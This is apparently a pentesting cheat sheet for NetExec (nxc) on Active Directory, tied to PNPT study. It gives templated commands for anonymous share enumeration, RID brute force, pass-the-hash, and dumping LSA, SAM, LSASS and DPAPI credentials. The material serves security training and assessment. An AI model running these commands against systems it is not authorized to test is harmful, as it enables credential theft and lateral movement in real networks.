Active Directory: NetExec (nxc)

SMB Share Enumeration

List all shares on the target and identify those with anonymous or guest access.

nxc smb {{target}} -u '' -p '' --shares
nxc smb {{target}} -u 'guest' -p '' --shares

User Enumeration & RID Brute Force

Enumerate valid users via SMB or perform RID brute-forcing to discover hidden accounts.

nxc smb {{dc_ip}} --users
nxc smb {{dc_ip}} --rid-brute {{limit}}

Pass the Hash (PtH) & Local Authentication

Authenticate using an NTLM hash or perform local authentication on targets.

nxc smb {{ip_range}} -u {{user}} -H {{ntlm_hash}} --local-auth

Credential Dumping (LSA & SAM)

Dump LSA secrets or SAM hashes from compromised targets where you have administrative access.

nxc smb {{target}} -u {{user}} -p {{password}} --lsa
nxc smb {{target}} -u {{user}} -p {{password}} --sam

Module Usage (lsassy & gpp_password)

Use the ‘lsassy’ module to extract LSASS credentials or ‘gpp_password’ for GPP discovery.

nxc smb {{ip_range}} -u {{user}} -p {{password}} -M lsassy
nxc smb {{ip_range}} -u {{user}} -p {{password}} -M gpp_password

DPAPI & Secrets Extraction

Search for DPAPI secrets on the target system.

nxc smb {{target}} -u {{user}} -p {{password}} --dpapi

Description

NetExec is a powerful post-exploitation tool that simplifies Active Directory security assessment by automating common tasks such as share enumeration, user discovery, and credential harvesting. It is an essential tool in PNPT for lateral movement and identifying misconfigurations across the domain.

References

• https://www.netexec.wiki/
• https://github.com/Pennyw0rth/NetExec
• https://www.hackingarticles.in/credential-dumping-with-netexec-nxc/